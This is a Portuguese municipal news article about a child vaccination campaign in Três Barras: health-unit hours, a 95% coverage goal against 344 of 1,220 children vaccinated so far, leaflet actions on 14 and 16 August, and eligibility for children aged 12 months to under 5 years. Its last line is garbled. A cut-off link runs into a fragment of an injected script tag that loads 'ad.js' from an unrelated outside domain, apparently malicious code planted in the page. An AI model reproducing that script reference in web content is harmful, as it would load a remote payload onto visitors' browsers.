Em Três Barras, as unidades básicas de saúde da sede do município, do distrito de São Cristóvão e do interior estarão abertas das 08h às 17h, sem fechar para o almoço.
Conforme a enfermeira Kátia Reis, responsável pelo setor de imunizações da Vigilância Epidemiológica Municipal, a expectativa é vacinar 95% do público alvo da campanha, no município, que é de 1.220 crianças. “A procura ainda é baixa, nossa esperança é que ela aumente principalmente no dia D da mobilização”, comenta.
Até o momento, apenas 28,20% do público infantil foi imunizado, ou seja, 344 crianças. A fim de conscientizar a população sobre a importância da vacinação no combate a essas doenças, é que o Governo de Três Barras, por meio da secretária de Saúde e a Vigilância Epidemiológica, promoveu algumas ações durante esta semana.
Duas delas foram realizadas nas manhãs dos dias 14 e 16 de agosto, com a entrega de panfletos da campanha a motoristas e pedestres. Os pedágios aconteceram, respectivamente, na Avenida Rigesa, em frente à loja Lk Confecções, no Km 02, e também na Avenida Abrahão Mussi, no distrito de São Cristóvão, em frente a unidade básica de saúde Dr. Mário Mussi.
Já nesta sexta-feira (17), a unidade básica de saúde Ailton Mendes (Posto Amarelo), aproveitou a atividade de pesagem dos pequenos para também atualizar as vacinas.
A campanha nacional segue até o dia 31 de agosto em todos os postos de saúde do município.
Quem deve se vacinar?
– Toda criança de 12 meses a menor de 5 anos de idade. Mesmo aquela com o calendário vacinal em dia deve receber as doses extras das vacinas.
– Vacinas disponíveis!
Papai e mamãe, vacinar seu filho é um ato de amor! Leve-o até a unidade de saúde mais próxima de sua casa. É necessário estar portando a caderneta de vacinação.
Para mais informações, acesse: www.tresbarras.sc.gov.br/noticias… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>